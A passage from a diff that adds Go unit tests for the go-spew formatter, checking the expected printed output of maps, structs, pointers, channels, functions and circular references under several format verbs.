+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+}
+
+func addMapFormatterTests() {
+	// Map with string keys and int vals.
+	v := map[string]int{"one": 1, "two": 2}
+	nilMap := map[string]int(nil)
+	nv := (*map[string]int)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "map[string]int"
+	vs := "map[one:1 two:2]"
+	vs2 := "map[two:2 one:1]"
+	addFormatterTest("%v", v, vs, vs2)
+	addFormatterTest("%v", pv, "<*>"+vs, "<*>"+vs2)
+	addFormatterTest("%v", &pv, "<**>"+vs, "<**>"+vs2)
+	addFormatterTest("%+v", nilMap, "<nil>")
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs, vs2)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs, "<*>("+vAddr+")"+vs2)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs,
+		"<**>("+pvAddr+"->"+vAddr+")"+vs2)
+	addFormatterTest("%+v", nilMap, "<nil>")
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs, "("+vt+")"+vs2)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs, "(*"+vt+")"+vs2)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs, "(**"+vt+")"+vs2)
+	addFormatterTest("%#v", nilMap, "("+vt+")"+"<nil>")
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs, "("+vt+")"+vs2)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs,
+		"(*"+vt+")("+vAddr+")"+vs2)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs,
+		"(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs2)
+	addFormatterTest("%#+v", nilMap, "("+vt+")"+"<nil>")
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Map with custom formatter type on pointer receiver only keys and vals.
+	v2 := map[pstringer]pstringer{"one": "1"}
+	nv2 := (*map[pstringer]pstringer)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "map[spew_test.pstringer]spew_test.pstringer"
+	v2s := "map[stringer one:stringer 1]"
+	if spew.UnsafeDisabled {
+		v2s = "map[one:1]"
+	}
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+
+	// Map with interface keys and values.
+	v3 := map[interface{}]interface{}{"one": 1}
+	nv3 := (*map[interface{}]interface{})(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "map[interface {}]interface {}"
+	v3t1 := "string"
+	v3t2 := "int"
+	v3s := "map[one:1]"
+	v3s2 := "map[(" + v3t1 + ")one:(" + v3t2 + ")1]"
+	addFormatterTest("%v", v3, v3s)
+	addFormatterTest("%v", pv3, "<*>"+v3s)
+	addFormatterTest("%v", &pv3, "<**>"+v3s)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%+v", v3, v3s)
+	addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+	addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%#v", v3, "("+v3t+")"+v3s2)
+	addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s2)
+	addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s2)
+	addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+	addFormatterTest("%#+v", v3, "("+v3t+")"+v3s2)
+	addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s2)
+	addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s2)
+	addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"<nil>")
+
+	// Map with nil interface value
+	v4 := map[string]interface{}{"nil": nil}
+	nv4 := (*map[string]interface{})(nil)
+	pv4 := &v4
+	v4Addr := fmt.Sprintf("%p", pv4)
+	pv4Addr := fmt.Sprintf("%p", &pv4)
+	v4t := "map[string]interface {}"
+	v4t1 := "interface {}"
+	v4s := "map[nil:<nil>]"
+	v4s2 := "map[nil:(" + v4t1 + ")<nil>]"
+	addFormatterTest("%v", v4, v4s)
+	addFormatterTest("%v", pv4, "<*>"+v4s)
+	addFormatterTest("%v", &pv4, "<**>"+v4s)
+	addFormatterTest("%+v", nv4, "<nil>")
+	addFormatterTest("%+v", v4, v4s)
+	addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s)
+	addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s)
+	addFormatterTest("%+v", nv4, "<nil>")
+	addFormatterTest("%#v", v4, "("+v4t+")"+v4s2)
+	addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s2)
+	addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s2)
+	addFormatterTest("%#v", nv4, "(*"+v4t+")"+"<nil>")
+	addFormatterTest("%#+v", v4, "("+v4t+")"+v4s2)
+	addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s2)
+	addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s2)
+	addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"<nil>")
+}
+
+func addStructFormatterTests() {
+	// Struct with primitives.
+	type s1 struct {
+		a int8
+		b uint8
+	}
+	v := s1{127, 255}
+	nv := (*s1)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "spew_test.s1"
+	vt2 := "int8"
+	vt3 := "uint8"
+	vs := "{127 255}"
+	vs2 := "{a:127 b:255}"
+	vs3 := "{a:(" + vt2 + ")127 b:(" + vt3 + ")255}"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs2)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs2)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs2)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs3)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs3)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs3)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs3)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs3)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs3)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Struct that contains another struct.
+	type s2 struct {
+		s1 s1
+		b  bool
+	}
+	v2 := s2{s1{127, 255}, true}
+	nv2 := (*s2)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "spew_test.s2"
+	v2t2 := "spew_test.s1"
+	v2t3 := "int8"
+	v2t4 := "uint8"
+	v2t5 := "bool"
+	v2s := "{{127 255} true}"
+	v2s2 := "{s1:{a:127 b:255} b:true}"
+	v2s3 := "{s1:(" + v2t2 + "){a:(" + v2t3 + ")127 b:(" + v2t4 + ")255} b:(" +
+		v2t5 + ")true}"
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%+v", v2, v2s2)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s2)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s2)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s3)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s3)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s3)
+	addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s3)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s3)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s3)
+	addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+
+	// Struct that contains custom type with Stringer pointer interface via both
+	// exported and unexported fields.
+	type s3 struct {
+		s pstringer
+		S pstringer
+	}
+	v3 := s3{"test", "test2"}
+	nv3 := (*s3)(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "spew_test.s3"
+	v3t2 := "spew_test.pstringer"
+	v3s := "{stringer test stringer test2}"
+	v3sp := v3s
+	v3s2 := "{s:stringer test S:stringer test2}"
+	v3s2p := v3s2
+	v3s3 := "{s:(" + v3t2 + ")stringer test S:(" + v3t2 + ")stringer test2}"
+	v3s3p := v3s3
+	if spew.UnsafeDisabled {
+		v3s = "{test test2}"
+		v3sp = "{test stringer test2}"
+		v3s2 = "{s:test S:test2}"
+		v3s2p = "{s:test S:stringer test2}"
+		v3s3 = "{s:(" + v3t2 + ")test S:(" + v3t2 + ")test2}"
+		v3s3p = "{s:(" + v3t2 + ")test S:(" + v3t2 + ")stringer test2}"
+	}
+	addFormatterTest("%v", v3, v3s)
+	addFormatterTest("%v", pv3, "<*>"+v3sp)
+	addFormatterTest("%v", &pv3, "<**>"+v3sp)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%+v", v3, v3s2)
+	addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s2p)
+	addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s2p)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%#v", v3, "("+v3t+")"+v3s3)
+	addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s3p)
+	addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s3p)
+	addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+	addFormatterTest("%#+v", v3, "("+v3t+")"+v3s3)
+	addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s3p)
+	addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s3p)
+	addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"<nil>")
+
+	// Struct that contains embedded struct and field to same struct.
+	e := embed{"embedstr"}
+	v4 := embedwrap{embed: &e, e: &e}
+	nv4 := (*embedwrap)(nil)
+	pv4 := &v4
+	eAddr := fmt.Sprintf("%p", &e)
+	v4Addr := fmt.Sprintf("%p", pv4)
+	pv4Addr := fmt.Sprintf("%p", &pv4)
+	v4t := "spew_test.embedwrap"
+	v4t2 := "spew_test.embed"
+	v4t3 := "string"
+	v4s := "{<*>{embedstr} <*>{embedstr}}"
+	v4s2 := "{embed:<*>(" + eAddr + "){a:embedstr} e:<*>(" + eAddr +
+		"){a:embedstr}}"
+	v4s3 := "{embed:(*" + v4t2 + "){a:(" + v4t3 + ")embedstr} e:(*" + v4t2 +
+		"){a:(" + v4t3 + ")embedstr}}"
+	v4s4 := "{embed:(*" + v4t2 + ")(" + eAddr + "){a:(" + v4t3 +
+		")embedstr} e:(*" + v4t2 + ")(" + eAddr + "){a:(" + v4t3 + ")embedstr}}"
+	addFormatterTest("%v", v4, v4s)
+	addFormatterTest("%v", pv4, "<*>"+v4s)
+	addFormatterTest("%v", &pv4, "<**>"+v4s)
+	addFormatterTest("%+v", nv4, "<nil>")
+	addFormatterTest("%+v", v4, v4s2)
+	addFormatterTest("%+v", pv4, "<*>("+v4Addr+")"+v4s2)
+	addFormatterTest("%+v", &pv4, "<**>("+pv4Addr+"->"+v4Addr+")"+v4s2)
+	addFormatterTest("%+v", nv4, "<nil>")
+	addFormatterTest("%#v", v4, "("+v4t+")"+v4s3)
+	addFormatterTest("%#v", pv4, "(*"+v4t+")"+v4s3)
+	addFormatterTest("%#v", &pv4, "(**"+v4t+")"+v4s3)
+	addFormatterTest("%#v", nv4, "(*"+v4t+")"+"<nil>")
+	addFormatterTest("%#+v", v4, "("+v4t+")"+v4s4)
+	addFormatterTest("%#+v", pv4, "(*"+v4t+")("+v4Addr+")"+v4s4)
+	addFormatterTest("%#+v", &pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")"+v4s4)
+	addFormatterTest("%#+v", nv4, "(*"+v4t+")"+"<nil>")
+}
+
+func addUintptrFormatterTests() {
+	// Null pointer.
+	v := uintptr(0)
+	nv := (*uintptr)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "uintptr"
+	vs := "<nil>"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Address of real variable.
+	i := 1
+	v2 := uintptr(unsafe.Pointer(&i))
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "uintptr"
+	v2s := fmt.Sprintf("%p", &i)
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+}
+
+func addUnsafePointerFormatterTests() {
+	// Null pointer.
+	v := unsafe.Pointer(uintptr(0))
+	nv := (*unsafe.Pointer)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "unsafe.Pointer"
+	vs := "<nil>"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Address of real variable.
+	i := 1
+	v2 := unsafe.Pointer(&i)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "unsafe.Pointer"
+	v2s := fmt.Sprintf("%p", &i)
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+}
+
+func addChanFormatterTests() {
+	// Nil channel.
+	var v chan int
+	pv := &v
+	nv := (*chan int)(nil)
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "chan int"
+	vs := "<nil>"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Real channel.
+	v2 := make(chan int)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "chan int"
+	v2s := fmt.Sprintf("%p", v2)
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+}
+
+func addFuncFormatterTests() {
+	// Function with no params and no returns.
+	v := addIntFormatterTests
+	nv := (*func())(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "func()"
+	vs := fmt.Sprintf("%p", v)
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+
+	// Function with param and no returns.
+	v2 := TestFormatter
+	nv2 := (*func(*testing.T))(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "func(*testing.T)"
+	v2s := fmt.Sprintf("%p", v2)
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s)
+	addFormatterTest("%v", &pv2, "<**>"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%+v", v2, v2s)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%+v", nv2, "<nil>")
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s)
+	addFormatterTest("%#v", nv2, "(*"+v2t+")"+"<nil>")
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s)
+	addFormatterTest("%#+v", nv2, "(*"+v2t+")"+"<nil>")
+
+	// Function with multiple params and multiple returns.
+	var v3 = func(i int, s string) (b bool, err error) {
+		return true, nil
+	}
+	nv3 := (*func(int, string) (bool, error))(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "func(int, string) (bool, error)"
+	v3s := fmt.Sprintf("%p", v3)
+	addFormatterTest("%v", v3, v3s)
+	addFormatterTest("%v", pv3, "<*>"+v3s)
+	addFormatterTest("%v", &pv3, "<**>"+v3s)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%+v", v3, v3s)
+	addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s)
+	addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s)
+	addFormatterTest("%+v", nv3, "<nil>")
+	addFormatterTest("%#v", v3, "("+v3t+")"+v3s)
+	addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s)
+	addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s)
+	addFormatterTest("%#v", nv3, "(*"+v3t+")"+"<nil>")
+	addFormatterTest("%#+v", v3, "("+v3t+")"+v3s)
+	addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s)
+	addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s)
+	addFormatterTest("%#+v", nv3, "(*"+v3t+")"+"<nil>")
+}
+
+func addCircularFormatterTests() {
+	// Struct that is circular through self referencing.
+	type circular struct {
+		c *circular
+	}
+	v := circular{nil}
+	v.c = &v
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "spew_test.circular"
+	vs := "{<*>{<*><shown>}}"
+	vs2 := "{<*><shown>}"
+	vs3 := "{c:<*>(" + vAddr + "){c:<*>(" + vAddr + ")<shown>}}"
+	vs4 := "{c:<*>(" + vAddr + ")<shown>}"
+	vs5 := "{c:(*" + vt + "){c:(*" + vt + ")<shown>}}"
+	vs6 := "{c:(*" + vt + ")<shown>}"
+	vs7 := "{c:(*" + vt + ")(" + vAddr + "){c:(*" + vt + ")(" + vAddr +
+		")<shown>}}"
+	vs8 := "{c:(*" + vt + ")(" + vAddr + ")<shown>}"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs2)
+	addFormatterTest("%v", &pv, "<**>"+vs2)
+	addFormatterTest("%+v", v, vs3)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs4)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs4)
+	addFormatterTest("%#v", v, "("+vt+")"+vs5)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs6)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs6)
+	addFormatterTest("%#+v", v, "("+vt+")"+vs7)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs8)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs8)
+
+	// Structs that are circular through cross referencing.
+	v2 := xref1{nil}
+	ts2 := xref2{&v2}
+	v2.ps2 = &ts2
+	pv2 := &v2
+	ts2Addr := fmt.Sprintf("%p", &ts2)
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "spew_test.xref1"
+	v2t2 := "spew_test.xref2"
+	v2s := "{<*>{<*>{<*><shown>}}}"
+	v2s2 := "{<*>{<*><shown>}}"
+	v2s3 := "{ps2:<*>(" + ts2Addr + "){ps1:<*>(" + v2Addr + "){ps2:<*>(" +
+		ts2Addr + ")<shown>}}}"
+	v2s4 := "{ps2:<*>(" + ts2Addr + "){ps1:<*>(" + v2Addr + ")<shown>}}"
+	v2s5 := "{ps2:(*" + v2t2 + "){ps1:(*" + v2t + "){ps2:(*" + v2t2 +
+		")<shown>}}}"
+	v2s6 := "{ps2:(*" + v2t2 + "){ps1:(*" + v2t + ")<shown>}}"
+	v2s7 := "{ps2:(*" + v2t2 + ")(" + ts2Addr + "){ps1:(*" + v2t +
+		")(" + v2Addr + "){ps2:(*" + v2t2 + ")(" + ts2Addr +
+		")<shown>}}}"
+	v2s8 := "{ps2:(*" + v2t2 + ")(" + ts2Addr + "){ps1:(*" + v2t +
+		")(" + v2Addr + ")<shown>}}"
+	addFormatterTest("%v", v2, v2s)
+	addFormatterTest("%v", pv2, "<*>"+v2s2)
+	addFormatterTest("%v", &pv2, "<**>"+v2s2)
+	addFormatterTest("%+v", v2, v2s3)
+	addFormatterTest("%+v", pv2, "<*>("+v2Addr+")"+v2s4)
+	addFormatterTest("%+v", &pv2, "<**>("+pv2Addr+"->"+v2Addr+")"+v2s4)
+	addFormatterTest("%#v", v2, "("+v2t+")"+v2s5)
+	addFormatterTest("%#v", pv2, "(*"+v2t+")"+v2s6)
+	addFormatterTest("%#v", &pv2, "(**"+v2t+")"+v2s6)
+	addFormatterTest("%#+v", v2, "("+v2t+")"+v2s7)
+	addFormatterTest("%#+v", pv2, "(*"+v2t+")("+v2Addr+")"+v2s8)
+	addFormatterTest("%#+v", &pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")"+v2s8)
+
+	// Structs that are indirectly circular.
+	v3 := indirCir1{nil}
+	tic2 := indirCir2{nil}
